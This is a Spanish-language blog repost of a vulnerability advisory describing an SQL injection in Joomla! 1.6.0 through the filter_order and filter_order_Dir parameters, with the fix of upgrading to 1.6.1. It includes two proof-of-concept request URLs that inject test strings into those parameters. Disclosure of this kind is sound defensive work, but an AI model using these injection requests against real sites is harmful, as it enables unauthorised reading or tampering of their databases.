SQL Injection Vulnerability en Joomla! 1.6.0

¿Qué es Joomla?

Joomla es un contenido libre y de código abierto sistema de gestión (CMS) para publicar contenido en la World Wide Web e intranets. Cuenta con un modelo-vista-controlador (MVC) de aplicaciones web que también pueden utilizarse de forma independiente.
Joomla es escrito en PHP, utiliza la programación orientada a objetos (POO) técnicas y patrones de diseño de software, almacena los datos en una base de datos MySQL, e incluye características tales como almacenamiento en caché de la página, los canales RSS, versiones imprimibles de páginas, flashes de noticias, blogs, encuestas, la búsqueda, y apoyo a la internacionalización del lenguaje.


Descripción de vulnerabilidad

Parámetros (filter_order, filer_order_Dir) no se desinfectan adecuadamente en Joomla! que conducen a la vulnerabilidad de inyección SQL. Esto podría usar un atacante para inyectar o manipular consultas SQL en la base de datos de back-end, lo que permite la manipulación o la revelación de datos arbitrarios.


Versión afectada

Joomla! 1.6.0


PROOF-OF-CONCEPT/EXPLOIT

http://attacker.in/joomla160/index.php/using-joomla/extensions/components/content-component/article-category-list/?filter_order=yehg.net.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAaAAAAAAAAAAAAAAAAAAA,&filter_order_Dir=2&limit=3&limitstart=4


http://attacker.in/joomla160/index.php/using-joomla/extensions/components/content-component/article-category-list/?filter_order=1,&filter_order_Dir=yehg.net.BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB,&limit=3&limitstart=4

Esta es la variante exactamente la misma como se muestra en Joomla! 1.5.21:

http://yehg.net/lab/pr0js/advisories/joomla/core/[joomla_1.5_21]_sql_injection



Solución

Migrar a Joomla! 1.6.1 o superior


Web Oficial de Joomla

http://www.joomla.org



Esta vulnerabilidad fue descubierta por Aung Khant, http://yehg.net, YGN Ethical Hacker Grupo, Myanmar.Fue vista en:

http://bl0g.yehg.net/2011/03/joomla-160-sql-injection-vulnerability.html



No hay comentarios: